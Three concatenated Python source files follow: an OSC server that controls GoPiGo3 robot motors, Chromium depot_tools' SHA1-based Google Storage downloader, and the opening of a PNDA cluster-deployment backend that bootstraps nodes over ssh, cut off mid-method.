import argparse import threading import platform from pythonosc import osc_server from pythonosc.dispatcher import Dispatcher from HostnameIp import HostnameIp PLATFORM = platform.machine() if "arm" in PLATFORM: from easygopigo3 import EasyGoPiGo3 # axisA = -255 and 255 # axisB = -255 and 255 # all the others between 0 and 1 (float) SAVE_TO_FILE = False MAXIMUM_SPEED = 1000 MIN_FROM_MAX = -500 MAX_FROM_MAX = 650 class OscData(): def __init__(self, osc_signal_obj): self.osc_signal = osc_signal_obj hostname_ip = HostnameIp() host_ip = hostname_ip.get_ip() parser = argparse.ArgumentParser() parser.add_argument("--ip", default="192.168.1.93", help="The ip to listen on") parser.add_argument("--port", type=int, default=8000, help="The port to listen on") args = parser.parse_args() if "arm" in PLATFORM: self.gpg = EasyGoPiGo3() self.gpg.set_speed(MAXIMUM_SPEED) self.final_data = {} self.data_file = open("data_file.txt", "a+") self.dispatcher = Dispatcher() self.dispatcher.map("/axisA/", self.axisa, "axisa") self.dispatcher.map("/axisB/", self.axisb, "axisb") self.dispatcher.map("/mlX/", self.mlx, "mlx") self.dispatcher.map("/mlY/", self.mly, "mly") self.dispatcher.map("/mlZ/", self.mlz, "mlz") self.dispatcher.map("/kinX/", self.kinx, "kinx") self.dispatcher.map("/kinY/", self.kiny, "kiny") self.dispatcher.map("/kinZ/", self.kinz, "kinz") self.dispatcher.map("/filter/", self.filter, "filter") if "arm" in PLATFORM: self.dispatcher.map("/left/", self.left, "left") self.dispatcher.map("/right/", self.right, "right") server = osc_server.ThreadingOSCUDPServer((args.ip, args.port), self.dispatcher) print("Serving on {}".format(server.server_address)) _serve = server.serve_forever server_thread = threading.Thread(target=_serve) server_thread.daemon = True server_thread.start() def filter(self, unused_addr, args, msg): self.osc_signal.osc_str.emit(str(msg)) def motor_power(self, value): return (((int(value) - MIN_FROM_MAX) * (100 - -100)) / (MAX_FROM_MAX - MIN_FROM_MAX)) + -100 
def left(self, unused_addr, args, msg): self.gpg.set_motor_power(self.gpg.MOTOR_LEFT, self.motor_power(msg)) def right(self, unused_addr, args, msg): self.gpg.set_motor_power(self.gpg.MOTOR_RIGHT, self.motor_power(msg)) def axisa(self, unused_addr, args, msg): self.final_data['axisa'] = msg def axisb(self, unused_addr, args, msg): self.final_data['axisb'] = msg if "arm" in PLATFORM: self.gpg.set_motor_power(self.gpg.MOTOR_RIGHT, self.motor_power(msg)) def mlx(self, unused_addr, args, msg): self.final_data['mlx'] = msg def mly(self, unused_addr, args, msg): self.final_data['mly'] = msg def mlz(self, unused_addr, args, msg): self.final_data['mlz'] = msg def kinx(self, unused_addr, args, msg): self.final_data['kinx'] = msg def kiny(self, unused_addr, args, msg): self.final_data['kiny'] = msg def kinz(self, unused_addr, args, msg): self.final_data['kinz'] = msg if SAVE_TO_FILE: self.data_file.write(str(self.final_data) + "\n") self.osc_signal.osc_str.emit(str(self.final_data))
# ===== file: download_from_google_storage.py =====
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Download files from Google Storage based on SHA1 sums.""" import hashlib import optparse import os import Queue import re import shutil import stat import sys import tarfile import threading import time import subprocess2 GSUTIL_DEFAULT_PATH = os.path.join( os.path.dirname(os.path.abspath(__file__)), 'gsutil.py') # Maps sys.platform to what we actually want to call them. PLATFORM_MAPPING = { 'cygwin': 'win', 'darwin': 'mac', 'linux2': 'linux', 'win32': 'win', } class FileNotFoundError(IOError): pass class InvalidFileError(IOError): pass class InvalidPlatformError(Exception): pass def GetNormalizedPlatform(): """Returns the result of sys.platform accounting for cygwin. Under cygwin, this will always return "win32" like the native Python.""" if sys.platform == 'cygwin': return 'win32' return sys.platform # Common utilities class Gsutil(object): """Call gsutil with some predefined settings. 
This is a convenience object, and is also immutable.""" MAX_TRIES = 5 RETRY_BASE_DELAY = 5.0 RETRY_DELAY_MULTIPLE = 1.3 def __init__(self, path, boto_path=None, timeout=None, version='4.46'): if not os.path.exists(path): raise FileNotFoundError('GSUtil not found in %s' % path) self.path = path self.timeout = timeout self.boto_path = boto_path self.version = version def get_sub_env(self): env = os.environ.copy() if self.boto_path == os.devnull: env['AWS_CREDENTIAL_FILE'] = '' env['BOTO_CONFIG'] = '' elif self.boto_path: env['AWS_CREDENTIAL_FILE'] = self.boto_path env['BOTO_CONFIG'] = self.boto_path return env def call(self, *args): cmd = [sys.executable, self.path, '--force-version', self.version] cmd.extend(args) return subprocess2.call(cmd, env=self.get_sub_env(), timeout=self.timeout) def check_call(self, *args): cmd = [sys.executable, self.path, '--force-version', self.version] cmd.extend(args) ((out, err), code) = subprocess2.communicate( cmd, stdout=subprocess2.PIPE, stderr=subprocess2.PIPE, env=self.get_sub_env(), timeout=self.timeout) # Parse output. status_code_match = re.search('status=([0-9]+)', err) if status_code_match: return (int(status_code_match.group(1)), out, err) if ('You are attempting to access protected data with ' 'no configured credentials.' 
in err): return (403, out, err) if 'matched no objects' in err: return (404, out, err) return (code, out, err) def check_call_with_retries(self, *args): delay = self.RETRY_BASE_DELAY for i in xrange(self.MAX_TRIES): code, out, err = self.check_call(*args) if not code or i == self.MAX_TRIES - 1: break time.sleep(delay) delay *= self.RETRY_DELAY_MULTIPLE return code, out, err def check_platform(target): """Checks if any parent directory of target matches (win|mac|linux).""" assert os.path.isabs(target) root, target_name = os.path.split(target) if not target_name: return None if target_name in ('linux', 'mac', 'win'): return target_name return check_platform(root) def get_sha1(filename): sha1 = hashlib.sha1() with open(filename, 'rb') as f: while True: # Read in 1mb chunks, so it doesn't all have to be loaded into memory. chunk = f.read(1024*1024) if not chunk: break sha1.update(chunk) return sha1.hexdigest() # Download-specific code starts here def enumerate_work_queue(input_filename, work_queue, directory, recursive, ignore_errors, output, sha1_file, auto_platform): if sha1_file: if not os.path.exists(input_filename): if not ignore_errors: raise FileNotFoundError('%s not found.' % input_filename) print >> sys.stderr, '%s not found.' % input_filename with open(input_filename, 'rb') as f: sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip()) if sha1_match: work_queue.put((sha1_match.groups(1)[0], output)) return 1 if not ignore_errors: raise InvalidFileError('No sha1 sum found in %s.' % input_filename) print >> sys.stderr, 'No sha1 sum found in %s.' 
% input_filename return 0 if not directory: work_queue.put((input_filename, output)) return 1 work_queue_size = 0 for root, dirs, files in os.walk(input_filename): if not recursive: for item in dirs[:]: dirs.remove(item) else: for exclude in ['.svn', '.git']: if exclude in dirs: dirs.remove(exclude) for filename in files: full_path = os.path.join(root, filename) if full_path.endswith('.sha1'): if auto_platform: # Skip if the platform does not match. target_platform = check_platform(os.path.abspath(full_path)) if not target_platform: err = ('--auto_platform passed in but no platform name found in ' 'the path of %s' % full_path) if not ignore_errors: raise InvalidFileError(err) print >> sys.stderr, err continue current_platform = PLATFORM_MAPPING[sys.platform] if current_platform != target_platform: continue with open(full_path, 'rb') as f: sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip()) if sha1_match: work_queue.put( (sha1_match.groups(1)[0], full_path.replace('.sha1', ''))) work_queue_size += 1 else: if not ignore_errors: raise InvalidFileError('No sha1 sum found in %s.' % filename) print >> sys.stderr, 'No sha1 sum found in %s.' % filename return work_queue_size def _validate_tar_file(tar, prefix): def _validate(tarinfo): """Returns false if the tarinfo is something we explicitly forbid.""" if tarinfo.issym() or tarinfo.islnk(): return False if '..' in tarinfo.name or not tarinfo.name.startswith(prefix): return False return True return all(map(_validate, tar.getmembers())) def _downloader_worker_thread(thread_num, q, force, base_url, gsutil, out_q, ret_codes, verbose, extract, delete=True): while True: input_sha1_sum, output_filename = q.get() if input_sha1_sum is None: return extract_dir = None if extract: if not output_filename.endswith('.tar.gz'): out_q.put('%d> Error: %s is not a tar.gz archive.' % ( thread_num, output_filename)) ret_codes.put((1, '%s is not a tar.gz archive.' 
% (output_filename))) continue extract_dir = output_filename[0:len(output_filename)-7] if os.path.exists(output_filename) and not force: if not extract or os.path.exists(extract_dir): if get_sha1(output_filename) == input_sha1_sum: if verbose: out_q.put( '%d> File %s exists and SHA1 matches. Skipping.' % ( thread_num, output_filename)) continue # Check if file exists. file_url = '%s/%s' % (base_url, input_sha1_sum) (code, _, err) = gsutil.check_call('ls', file_url) if code != 0: if code == 404: out_q.put('%d> File %s for %s does not exist, skipping.' % ( thread_num, file_url, output_filename)) ret_codes.put((1, 'File %s for %s does not exist.' % ( file_url, output_filename))) else: # Other error, probably auth related (bad ~/.boto, etc). out_q.put('%d> Failed to fetch file %s for %s, skipping. [Err: %s]' % ( thread_num, file_url, output_filename, err)) ret_codes.put((1, 'Failed to fetch file %s for %s. [Err: %s]' % ( file_url, output_filename, err))) continue # Fetch the file. out_q.put('%d> Downloading %s...' % (thread_num, output_filename)) try: if delete: os.remove(output_filename) # Delete the file if it exists already. except OSError: if os.path.exists(output_filename): out_q.put('%d> Warning: deleting %s failed.' % ( thread_num, output_filename)) code, _, err = gsutil.check_call('cp', file_url, output_filename) if code != 0: out_q.put('%d> %s' % (thread_num, err)) ret_codes.put((code, err)) continue remote_sha1 = get_sha1(output_filename) if remote_sha1 != input_sha1_sum: msg = ('%d> ERROR remote sha1 (%s) does not match expected sha1 (%s).' % (thread_num, remote_sha1, input_sha1_sum)) out_q.put(msg) ret_codes.put((20, msg)) continue if extract: if not tarfile.is_tarfile(output_filename): out_q.put('%d> Error: %s is not a tar.gz archive.' % ( thread_num, output_filename)) ret_codes.put((1, '%s is not a tar.gz archive.' 
% (output_filename))) continue with tarfile.open(output_filename, 'r:gz') as tar: dirname = os.path.dirname(os.path.abspath(output_filename)) if not _validate_tar_file(tar, os.path.basename(extract_dir)): out_q.put('%d> Error: %s contains files outside %s.' % ( thread_num, output_filename, extract_dir)) ret_codes.put((1, '%s contains invalid entries.' % (output_filename))) continue if os.path.exists(extract_dir): try: shutil.rmtree(extract_dir) out_q.put('%d> Removed %s...' % (thread_num, extract_dir)) except OSError: out_q.put('%d> Warning: Can\'t delete: %s' % ( thread_num, extract_dir)) ret_codes.put((1, 'Can\'t delete %s.' % (extract_dir))) continue out_q.put('%d> Extracting %d entries from %s to %s' % (thread_num, len(tar.getmembers()),output_filename, extract_dir)) tar.extractall(path=dirname) # Set executable bit. if sys.platform == 'cygwin': # Under cygwin, mark all files as executable. The executable flag in # Google Storage will not be set when uploading from Windows, so if # this script is running under cygwin and we're downloading an # executable, it will be unrunnable from inside cygwin without this. st = os.stat(output_filename) os.chmod(output_filename, st.st_mode | stat.S_IEXEC) elif sys.platform != 'win32': # On non-Windows platforms, key off of the custom header # "x-goog-meta-executable". code, out, _ = gsutil.check_call('stat', file_url) if code != 0: out_q.put('%d> %s' % (thread_num, err)) ret_codes.put((code, err)) elif re.search(r'executable:\s*1', out): st = os.stat(output_filename) os.chmod(output_filename, st.st_mode | stat.S_IEXEC) def printer_worker(output_queue): while True: line = output_queue.get() # Its plausible we want to print empty lines. if line is None: break print line def download_from_google_storage( input_filename, base_url, gsutil, num_threads, directory, recursive, force, output, ignore_errors, sha1_file, verbose, auto_platform, extract): # Start up all the worker threads. 
all_threads = [] download_start = time.time() stdout_queue = Queue.Queue() work_queue = Queue.Queue() ret_codes = Queue.Queue() ret_codes.put((0, None)) for thread_num in range(num_threads): t = threading.Thread( target=_downloader_worker_thread, args=[thread_num, work_queue, force, base_url, gsutil, stdout_queue, ret_codes, verbose, extract]) t.daemon = True t.start() all_threads.append(t) printer_thread = threading.Thread(target=printer_worker, args=[stdout_queue]) printer_thread.daemon = True printer_thread.start() # Enumerate our work queue. work_queue_size = enumerate_work_queue( input_filename, work_queue, directory, recursive, ignore_errors, output, sha1_file, auto_platform) for _ in all_threads: work_queue.put((None, None)) # Used to tell worker threads to stop. # Wait for all downloads to finish. for t in all_threads: t.join() stdout_queue.put(None) printer_thread.join() # See if we ran into any errors. max_ret_code = 0 for ret_code, message in ret_codes.queue: max_ret_code = max(ret_code, max_ret_code) if message: print >> sys.stderr, message if verbose and not max_ret_code: print 'Success!' if verbose: print 'Downloading %d files took %1f second(s)' % ( work_queue_size, time.time() - download_start) return max_ret_code def main(args): usage = ('usage: %prog [options] target\n' 'Target must be:\n' ' (default) a sha1 sum ([A-Za-z0-9]{40}).\n' ' (-s or --sha1_file) a .sha1 file, containing a sha1 sum on ' 'the first line.\n' ' (-d or --directory) A directory to scan for .sha1 files.') parser = optparse.OptionParser(usage) parser.add_option('-o', '--output', help='Specify the output file name. Defaults to: ' '(a) Given a SHA1 hash, the name is the SHA1 hash. 
' '(b) Given a .sha1 file or directory, the name will ' 'match (.*).sha1.') parser.add_option('-b', '--bucket', help='Google Storage bucket to fetch from.') parser.add_option('-e', '--boto', help='Specify a custom boto file.') parser.add_option('-c', '--no_resume', action='store_true', help='DEPRECATED: Resume download if file is ' 'partially downloaded.') parser.add_option('-f', '--force', action='store_true', help='Force download even if local file exists.') parser.add_option('-i', '--ignore_errors', action='store_true', help='Don\'t throw error if we find an invalid .sha1 file.') parser.add_option('-r', '--recursive', action='store_true', help='Scan folders recursively for .sha1 files. ' 'Must be used with -d/--directory') parser.add_option('-t', '--num_threads', default=1, type='int', help='Number of downloader threads to run.') parser.add_option('-d', '--directory', action='store_true', help='The target is a directory. ' 'Cannot be used with -s/--sha1_file.') parser.add_option('-s', '--sha1_file', action='store_true', help='The target is a file containing a sha1 sum. ' 'Cannot be used with -d/--directory.') parser.add_option('-g', '--config', action='store_true', help='Alias for "gsutil config". Run this if you want ' 'to initialize your saved Google Storage ' 'credentials. This will create a read-only ' 'credentials file in ~/.boto.depot_tools.') parser.add_option('-n', '--no_auth', action='store_true', help='Skip auth checking. Use if it\'s known that the ' 'target bucket is a public bucket.') parser.add_option('-p', '--platform', help='A regular expression that is compared against ' 'Python\'s sys.platform. If this option is specified, ' 'the download will happen only if there is a match.') parser.add_option('-a', '--auto_platform', action='store_true', help='Detects if any parent folder of the target matches ' '(linux|mac|win). 
If so, the script will only ' 'process files that are in the paths that ' 'that matches the current platform.') parser.add_option('-u', '--extract', action='store_true', help='Extract a downloaded tar.gz file. ' 'Leaves the tar.gz file around for sha1 verification' 'If a directory with the same name as the tar.gz ' 'file already exists, is deleted (to get a ' 'clean state in case of update.)') parser.add_option('-v', '--verbose', action='store_true', default=True, help='DEPRECATED: Defaults to True. Use --no-verbose ' 'to suppress.') parser.add_option('-q', '--quiet', action='store_false', dest='verbose', help='Suppresses diagnostic and progress information.') (options, args) = parser.parse_args() # Make sure we should run at all based on platform matching. if options.platform: if options.auto_platform: parser.error('--platform can not be specified with --auto_platform') if not re.match(options.platform, GetNormalizedPlatform()): if options.verbose: print('The current platform doesn\'t match "%s", skipping.' % options.platform) return 0 # Set the boto file to /dev/null if we don't need auth. if options.no_auth: if (set(('http_proxy', 'https_proxy')).intersection( env.lower() for env in os.environ) and 'NO_AUTH_BOTO_CONFIG' not in os.environ): print >> sys.stderr, ('NOTICE: You have PROXY values set in your ' 'environment, but gsutil in depot_tools does not ' '(yet) obey them.') print >> sys.stderr, ('Also, --no_auth prevents the normal BOTO_CONFIG ' 'environment variable from being used.') print >> sys.stderr, ('To use a proxy in this situation, please supply ' 'those settings in a .boto file pointed to by ' 'the NO_AUTH_BOTO_CONFIG environment var.') options.boto = os.environ.get('NO_AUTH_BOTO_CONFIG', os.devnull) # Make sure gsutil exists where we expect it to. if os.path.exists(GSUTIL_DEFAULT_PATH): gsutil = Gsutil(GSUTIL_DEFAULT_PATH, boto_path=options.boto) else: parser.error('gsutil not found in %s, bad depot_tools checkout?' 
% GSUTIL_DEFAULT_PATH) # Passing in -g/--config will run our copy of GSUtil, then quit. if options.config: print '===Note from depot_tools===' print 'If you do not have a project ID, enter "0" when asked for one.' print '===End note from depot_tools===' print return gsutil.call('config') if not args: parser.error('Missing target.') if len(args) > 1: parser.error('Too many targets.') if not options.bucket: parser.error('Missing bucket. Specify bucket with --bucket.') if options.sha1_file and options.directory: parser.error('Both --directory and --sha1_file are specified, ' 'can only specify one.') if options.recursive and not options.directory: parser.error('--recursive specified but --directory not specified.') if options.output and options.directory: parser.error('--directory is specified, so --output has no effect.') if (not (options.sha1_file or options.directory) and options.auto_platform): parser.error('--auto_platform must be specified with either ' '--sha1_file or --directory') input_filename = args[0] # Set output filename if not specified. if not options.output and not options.directory: if not options.sha1_file: # Target is a sha1 sum, so output filename would also be the sha1 sum. options.output = input_filename elif options.sha1_file: # Target is a .sha1 file. if not input_filename.endswith('.sha1'): parser.error('--sha1_file is specified, but the input filename ' 'does not end with .sha1, and no --output is specified. ' 'Either make sure the input filename has a .sha1 ' 'extension, or specify --output.') options.output = input_filename[:-5] else: parser.error('Unreachable state.') base_url = 'gs://%s' % options.bucket return download_from_google_storage( input_filename, base_url, gsutil, options.num_threads, options.directory, options.recursive, options.force, options.output, options.ignore_errors, options.sha1_file, options.verbose, options.auto_platform, options.extract) if __name__ == '__main__': sys.exit(main(sys.argv))
# ===== file: backend_base.py =====
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# This software is licensed to you under the terms of the Apache License, Version 2.0
# (the "License").
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
# The code, technical concepts, and all information contained herein, are the property of
# Cisco Technology, Inc.and/or its affiliated entities, under various laws including copyright,
# international treaties, patent, and/or contract.
# Any use of the material herein must be in accordance with the terms of the License.
# All rights not expressly granted by the License are reserved.
# Unless required by applicable law or agreed to separately in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied.
#
# Purpose: Backend base implementation for creating PNDA

import uuid
import sys
import os
import os.path
import json
import time
import traceback
import tarfile
import Queue
import StringIO
from threading import Thread

import requests
import yaml

import pnda_cli_utils as utils
from pnda_cli_utils import PNDAConfigException
from pnda_cli_utils import MILLI_TIME
from pnda_cli_utils import to_runfile
from ssh_client import SshClient
from service_registry_consul import ServiceRegistryConsul
import subprocess_to_log

utils.init_logging()
CONSOLE = utils.CONSOLE_LOGGER
LOG = utils.FILE_LOGGER
LOG_FILE_NAME = utils.LOG_FILE_NAME

# Appended to piped shell commands so a failure in the first pipeline stage
# (normally masked by "| tee") still aborts with that stage's exit code.
THROW_BASH_ERROR = "cmd_result=${PIPESTATUS[0]} && if [ ${cmd_result} != '0' ]; then exit ${cmd_result}; fi"

class BaseBackend(object):
    '''
    Base class for deploying PNDA
    Must to be overridden to support specific deployment targets
    '''
    def __init__(self, pnda_env, cluster, no_config_check, flavor, keyfile, branch):
        self._pnda_env = pnda_env
        self._cluster = cluster
        self._ssh_client = SshClient(self._cluster)
        self._no_config_check = no_config_check
        self._flavor = flavor
        self._keyfile = keyfile
        self._branch = branch
        # load_node_config is implemented by the concrete backend; it needs a
        # flavor to know which node-role descriptor to read.
        if flavor is not None:
            self._node_config = self.load_node_config()
        self._cached_instance_map = None
        self._set_up_env_conf()
        self._service_registry = ServiceRegistryConsul(self._ssh_client)

    ### Public interface
    def create(self, node_counts):
        '''
        Create a new PNDA deployment
        Parameters:
         - node_counts: a dictionary containing counts of the number of nodes required.
                        Should contain the following keys:
                        'datanodes', 'opentsdb_nodes', 'kafka_nodes', 'zk_nodes'
        Returns the private IP address of the console node.
        '''
        if not self._no_config_check:
            self._check_config(self._keyfile)
        self.pre_install_pnda(node_counts)
        self._set_up_env_conf()
        self._install_pnda()
        self.post_install_pnda()
        instance_map = self.get_instance_map()
        return instance_map[self._cluster + '-' + self._node_config['console-instance']]['private_ip_address']

    def expand(self, node_counts, do_orchestrate):
        '''
        Expand an existing PNDA deployment
        Parameters:
         - node_counts: a dictionary containing counts of the number of nodes required.
                        Should contain the following keys:
                        'datanodes', 'opentsdb_nodes', 'kafka_nodes', 'zk_nodes'
         - do_orchestrate: set to True to include the orchestrate phase during PNDA installation,
                           this is required when performing an operation that affects the
                           Hadoop cluster, e.g. increasing the number of datanodes
        Returns the private IP address of the console node.
        '''
        if not self._no_config_check:
            self._check_config(self._keyfile)
        self.pre_expand_pnda(node_counts)
        self._expand_pnda(do_orchestrate)
        self.post_expand_pnda()
        instance_map = self.get_instance_map()
        return instance_map[self._cluster + '-' + self._node_config['console-instance']]['private_ip_address']

    def destroy(self):
        '''
        Destroy an existing PNDA deployment
        '''
        self.pre_destroy_pnda()
        self._destroy_pnda()
        self.post_destroy_pnda()

    def get_instance_map(self, check_bootstrapped=False):
        '''
        Generate a descriptor of the instances that make up the PNDA cluster
        Parameters:
         - check_bootstrapped: set to True to include a 'bootstrapped' flag on each element
                               that indicated whether that instance is already bootstrapped.
        Notes:
         - The instance map is cached. Use clear_instance_map_cache() to force recalculation
           otherwise the cached version will be returned. This is because the operation is
           potentially slow if check_bootstrapped is used.
        '''
        if not self._cached_instance_map:
            instance_map = self.fill_instance_map()
            self._ssh_client.set_ip_mappings(instance_map)
            if check_bootstrapped:
                self._check_hosts_bootstrapped(
                    instance_map,
                    self._cluster + '-' + self._node_config['bastion-instance'] in instance_map)
            self._cached_instance_map = instance_map
        return self._cached_instance_map

    def clear_instance_map_cache(self):
        '''
        Clear the instance map cache so that the instance map will be recalculated
        on the next call to get_instance_map.
        '''
        self._cached_instance_map = None

    ### Methods that may be overridden in implementation class to introduce deployment
    ### specific behaviour
    def check_target_specific_config(self):
        '''
        Perform checks specific to the deployment target in question
        '''
        pass

    def load_node_config(self):
        '''
        Generate a config descriptor that indicates certain special nodes
        (i.e. console, bastion & saltmaster)
        '''
        pass

    def fill_instance_map(self):
        '''
        Generate a descriptor of the instances that make up the PNDA cluster
        '''
        pass

    def pre_install_pnda(self, node_counts):
        '''
        Hook that is called before PNDA is installed to allow operations specific
        to the deployment target in question
        '''
        pass

    def post_install_pnda(self):
        '''
        Hook that is called after PNDA is installed to allow operations specific
        to the deployment target in question
        '''
        pass

    def pre_expand_pnda(self, node_counts):
        '''
        Hook that is called before PNDA is expanded to allow operations specific
        to the deployment target in question
        '''
        pass

    def post_expand_pnda(self):
        '''
        Hook that is called after PNDA is expanded to allow operations specific
        to the deployment target in question
        '''
        pass

    def pre_destroy_pnda(self):
        '''
        Hook that is called before PNDA is destroyed to allow operations specific
        to the deployment target in question
        '''
        pass

    def post_destroy_pnda(self):
        '''
        Hook that is called after PNDA is destroyed to allow operations specific
        to the deployment target in question
        '''
        pass
    ### END (Methods that should be overridden in implementation class) ###

    def _ship_certs(self, saltmaster_ip):
        '''
        Tar up the local security certificates and scp them to the saltmaster.
        Returns the tarball file name, or None in permissive mode when the
        certificates are missing. Raises PNDAConfigException otherwise.
        '''
        platform_certs_tarball = None
        try:
            local_certs_path = self._pnda_env['security']['SECURITY_MATERIAL_PATH']
            platform_certs_tarball = '%s.tar.gz' % str(uuid.uuid1())
            with tarfile.open(platform_certs_tarball, mode='w:gz') as archive:
                archive.add(local_certs_path, arcname='security-certs', recursive=True)
        except Exception as exception:
            if self._pnda_env['security']['SECURITY_MODE'] == 'permissive':
                LOG.warning(exception)
                return None
            else:
                CONSOLE.error(exception)
                raise PNDAConfigException("Error: %s must contain certificates" % local_certs_path)
        self._ssh_client.scp([platform_certs_tarball], saltmaster_ip)
        os.remove(platform_certs_tarball)
        return platform_certs_tarball

    def _get_volume_info(self, node_type, config_file):
        '''
        Look up the volume class descriptor for node_type in the given YAML file.
        Returns None when node_type is empty.
        '''
        volumes = None
        if node_type:
            with open(config_file, 'r') as infile:
                # safe_load: volume-config.yaml only contains plain data and
                # yaml.load without a Loader is unsafe/deprecated.
                volume_config = yaml.safe_load(infile)
            volume_class = volume_config['instances'][node_type]
            volumes = volume_config['classes'][volume_class]
        return volumes

    def _set_up_env_conf(self):
        # Regenerate the per-cluster env script and the ssh proxy config.
        self._write_pnda_env_sh(self._cluster)
        self._ssh_client.write_ssh_config(self._get_bastion_ip(),
                                          self._pnda_env['infrastructure']['OS_USER'],
                                          os.path.abspath(self._keyfile))

    def _write_pnda_env_sh(self, cluster):
        '''
        Flatten pnda_env into a shell script of export statements, omitting
        settings that are only meaningful on the client side.
        '''
        client_only = ['AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'PLATFORM_GIT_BRANCH']
        with open('cli/pnda_env_%s.sh' % cluster, 'w') as pnda_env_sh_file:
            for section in self._pnda_env:
                for setting in self._pnda_env[section]:
                    if setting not in client_only:
                        # Lists/tuples are quoted so they survive as a single shell word.
                        val = '"%s"' % self._pnda_env[section][setting] if isinstance(
                            self._pnda_env[section][setting], (list, tuple)) else self._pnda_env[section][setting]
                        pnda_env_sh_file.write('export %s=%s\n' % (setting, val))

    def _bootstrap(self, instance, saltmaster, cluster, flavor, branch, salt_tarball,
                   certs_tarball, error_queue, bootstrap_files=None, bootstrap_commands=None):
        '''
        Bootstrap a single instance: scp the bootstrap scripts, then run them over ssh.
        Any failure is reported via error_queue (this runs on worker threads, so
        exceptions cannot propagate to the caller directly).
        '''
        ret_val = None
        try:
            ip_address = instance['private_ip_address']
            CONSOLE.debug('bootstrapping %s', ip_address)
            node_type = instance['node_type']
            if len(node_type) <= 0:
                # Instances without a node type take no part in the PNDA install.
                return
            type_script = 'bootstrap-scripts/%s/%s.sh' % (flavor, node_type)
            if not os.path.isfile(type_script):
                # Fall back to the generic script when the flavor has no override.
                type_script = 'bootstrap-scripts/%s.sh' % (node_type)
            node_idx = instance['node_idx']
            files_to_scp = ['cli/pnda_env_%s.sh' % cluster,
                            'bootstrap-scripts/package-install.sh',
                            'bootstrap-scripts/base.sh',
                            'bootstrap-scripts/base_post.sh',
                            'bootstrap-scripts/volume-mappings.sh',
                            type_script]
            volume_config = 'bootstrap-scripts/%s/%s' % (flavor, 'volume-config.yaml')
            requested_volumes = self._get_volume_info(node_type, volume_config)
            cmds_to_run = ['source /tmp/pnda_env_%s.sh' % cluster,
                           'export PNDA_SALTMASTER_IP=%s' % saltmaster,
                           'export PNDA_CLUSTER=%s' % cluster,
                           'export PNDA_FLAVOR=%s' % flavor,
                           'export PLATFORM_GIT_BRANCH=%s' % branch,
                           'export PLATFORM_SALT_TARBALL=%s' % salt_tarball if salt_tarball is not None else ':',
                           'export SECURITY_CERTS_TARBALL=%s' % certs_tarball if certs_tarball is not None else ':',
                           'sudo chmod a+x /tmp/package-install.sh',
                           'sudo chmod a+x /tmp/base.sh',
                           'sudo chmod a+x /tmp/base_post.sh',
                           'sudo chmod a+x /tmp/volume-mappings.sh']
            if requested_volumes is not None and 'partitions' in requested_volumes:
                cmds_to_run.append(
                    'sudo mkdir -p /etc/pnda/disk-config && echo \'%s\' | sudo tee /etc/pnda/disk-config/partitions' % '\n'.join(
                        requested_volumes['partitions']))
            if requested_volumes is not None and 'volumes' in requested_volumes:
                cmds_to_run.append(
                    'sudo mkdir -p /etc/pnda/disk-config && echo \'%s\' | sudo tee /etc/pnda/disk-config/requested-volumes' % '\n'.join(
                        requested_volumes['volumes']))
            cmds_to_run.append('(sudo -E /tmp/base.sh 2>&1) | tee -a pnda-bootstrap.log; %s' % THROW_BASH_ERROR)

            if node_type == self._node_config['salt-master-instance'] or "is_saltmaster" in instance:
                # The saltmaster additionally generates minion keys and runs the
                # saltmaster-common provisioning before its type script.
                cmds_to_run.append('echo \'%s\' | tee /tmp/minions_list' % '\n'.join(self._get_minions_to_bootstrap()))
                files_to_scp.append('bootstrap-scripts/saltmaster-gen-keys.sh')
                cmds_to_run.append('sudo chmod a+x /tmp/saltmaster-gen-keys.sh')
                files_to_scp.append('bootstrap-scripts/saltmaster-common.sh')
                cmds_to_run.append('sudo chmod a+x /tmp/saltmaster-common.sh')
                cmds_to_run.append('(sudo -E /tmp/saltmaster-common.sh 2>&1) | tee -a pnda-bootstrap.log; %s' % THROW_BASH_ERROR)
                if os.path.isfile('git.pem'):
                    files_to_scp.append('git.pem')
                files_to_scp.append(self._keyfile)

            cmds_to_run.append('sudo chmod a+x /tmp/%s.sh' % node_type)
            cmds_to_run.append('(sudo -E /tmp/%s.sh %s 2>&1) | tee -a pnda-bootstrap.log; %s' % (node_type, node_idx, THROW_BASH_ERROR))
            cmds_to_run.append('(sudo -E /tmp/base_post.sh 2>&1) | tee -a pnda-bootstrap.log; %s' % THROW_BASH_ERROR)
            cmds_to_run.append('touch ~/.bootstrap_complete')

            self._ssh_client.scp(files_to_scp, ip_address)
            self._ssh_client.ssh(cmds_to_run, ip_address)
            # Record what was shipped/run so it can be exported for offline use.
            if bootstrap_files is not None:
                map(bootstrap_files.put, files_to_scp)
                bootstrap_files.put(volume_config)
            if bootstrap_commands is not None:
                map(bootstrap_commands.put, cmds_to_run)
        except:
            ret_val = 'Error for host %s. %s' % (instance['name'], traceback.format_exc())
            CONSOLE.error(ret_val)
            error_queue.put(ret_val)

    def _process_thread_errors(self, action, errors):
        # Raise on the first queued worker-thread error, if any.
        while not errors.empty():
            error_message = errors.get()
            raise Exception("Error %s, error msg: %s. See debug log (%s) for details." % (action, error_message, LOG_FILE_NAME))

    def _wait_on_host_operations(self, action, thread_list, bastion_used, errors):
        # Run the threads in thread_list in sets, waiting for each set to
        # complete before moving onto the next.
        generic_timeout_minutes = 10
        thread_set_size = self._pnda_env['cli']['MAX_SIMULTANEOUS_OUTBOUND_CONNECTIONS']
        thread_sets = [thread_list[x:x+thread_set_size] for x in xrange(0, len(thread_list), thread_set_size)]
        for thread_set in thread_sets:
            for thread in thread_set:
                thread.start()
                if bastion_used:
                    # If there is no bastion, start all threads at once. Otherwise leave a gap
                    # between starting each one to avoid overloading the bastion with too many
                    # inbound connections and possibly having one rejected.
                    wait_seconds = 2
                    CONSOLE.debug('Staggering connections to avoid overloading bastion, waiting %s seconds', wait_seconds)
                    time.sleep(wait_seconds)
            for thread in thread_set:
                thread.join(generic_timeout_minutes * 60)
                if thread.isAlive():
